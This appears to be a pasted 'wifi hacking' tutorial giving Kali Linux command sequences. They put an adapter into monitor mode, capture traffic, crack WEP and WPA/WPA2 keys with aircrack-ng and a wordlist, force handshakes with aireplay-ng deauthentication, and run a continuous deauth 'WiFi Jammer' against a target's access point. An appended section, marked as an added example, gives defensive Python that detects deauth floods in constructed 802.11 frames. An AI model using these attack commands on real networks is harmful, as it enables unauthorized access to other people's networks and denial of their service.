senthilnasa

wifi hacking

Feb 25th, 2019
CAPTURING WIRELESS COMMUNICATION PACKETS
========================================

Attacker's Machine - Kali OS
Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
Tools - Airmon-ng, Airodump-ng (non-graphical)


Modes of Using a Wireless Adapter :

* Standard Mode : The mode basically everyone uses to connect to and use the services of a particular Access Point.
* Monitoring Mode : The mode which allows a system with a wireless network interface controller to monitor all traffic received from the wireless network.

Command: iwconfig --> to check which mode the wifi adapter is working in


Tools we will be encountering are :

* Airmon-ng : A tool which puts our wireless card into promiscuous mode. Yes, that means our wireless card will hook up with anyone!
Well, that's almost correct. When our network card is in promiscuous mode, it can see and receive all network traffic. Normally a network card only receives packets intended for it (as determined by the MAC address of the NIC), but with airmon-ng it will receive all wireless traffic, whether intended for us or not.

Commands:
# iwconfig
# airmon-ng start wlan0
# kill <PID> (processes that might cause problems)


* Airodump-ng : A tool which enables us to capture packets of our specification. It will show us some more information about a particular wireless network, so let's discuss some of the keywords.

Commands:
# airodump-ng wlan0mon


Terminologies
=============
Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.

#Data : Number of captured data packets, including data broadcast packets.

#/s : Number of data packets per second, measured over the last 10 seconds.

CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.

MB : Maximum speed supported by the AP.

ENC : Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.

CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).

WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates the version supported.

BSSID : The MAC / physical address of the Access Point.

ESSID : Name of the Access Point.

WEP
===
# iwconfig
# airmon-ng
# airmon-ng start wlan0
# iwconfig
# airodump-ng wlan0mon
Note the target's BSSID and channel number.
# airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
Wait until the number of beacons reaches 25,000.
# aircrack-ng aranjit-01.cap

WPA|WPA2
========
When there is a new device connecting
-------------------------------------
# iwconfig

# airmon-ng
# airmon-ng start wlan0
# iwconfig
# airodump-ng wlan0mon
Note the target's BSSID and channel number.
# airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
This captures the WPA handshake.
# aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap


When there is no new device connecting
--------------------------------------
# iwconfig
# airmon-ng
# airmon-ng start wlan0
# iwconfig
# airodump-ng wlan0mon
Note the target's BSSID and channel number.
# airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <capture file prefix, e.g. aranjit> wlan0mon
This captures the WPA handshake.
# aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
Deauthenticating the station makes it reconnect, so we capture the handshake.
# aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap

WiFi Jammer
===========
# aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon


________

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

-0 means deauthentication
1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
ath0 is the interface name
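As an added example from the detection side (not part of the original notes or of aircrack-ng), the script below parses raw 802.11 management frames and raises an alert when one BSSID emits a burst of deauthentication/disassociation frames, the pattern produced by the WiFi Jammer command and the `aireplay-ng -0` options explained above; a broadcast target (FF:FF:FF:FF:FF:FF) is flagged separately. The frames, MAC addresses and thresholds are constructed for the example; `sample_deauth` only builds test bytes and never transmits.

```python
"""Detect deauth/disassoc floods (the 'WiFi Jammer' pattern) in raw 802.11
frames. Added defender-side example, not aircrack-ng code; frames are constructed."""
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 12, 10             # 802.11 management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"       # addr1 used by the jammer command above

def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """(subtype, addr1, addr2, bssid, reason) for deauth/disassoc frames, else None.
    Header layout: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2) body."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)    # 2-byte reason code
    return subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason

def sample_deauth(dst, src, bssid, seq=0, reason=7):
    """Constructed test fixture: one deauth frame from src to dst (never transmitted)."""
    hdr = struct.pack("<BBH", DEAUTH << 4, 0, 0) + dst + src + bssid
    return hdr + struct.pack("<HH", seq << 4, reason)

def detect_floods(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_s, raw_bytes). Returns {bssid: (count, to_broadcast)}
    for BSSIDs with >= threshold deauth/disassoc frames within `window` seconds."""
    history = defaultdict(list)       # bssid -> [(ts, is_broadcast)]
    alerts = {}
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue                  # data/control frames are ignored
        _, addr1, _, bssid, _ = parsed
        hist = history[bssid]
        hist.append((ts, addr1 == BROADCAST))
        hist[:] = [h for h in hist if ts - h[0] <= window]     # slide the window
        if len(hist) >= threshold and bssid not in alerts:
            alerts[bssid] = (len(hist), any(bcast for _, bcast in hist))
    return alerts

# Constructed capture: 10 broadcast deauths within a second from fictional AP1,
# one lone deauth to a single client from AP2, and one data frame (FC 0x08).
AP1, AP2 = bytes.fromhex("020000000101"), bytes.fromhex("020000000202")
CLIENT = bytes.fromhex("0200000000aa")
SAMPLE = [(i * 0.1, sample_deauth(b"\xff" * 6, AP1, AP1, seq=i)) for i in range(10)]
SAMPLE += [(5.0, sample_deauth(CLIENT, AP2, AP2)), (5.1, bytes([0x08, 0]) + bytes(24))]
```

Run over a real capture by feeding `(timestamp, frame_bytes)` pairs from a monitor-mode pcap with the radiotap header stripped.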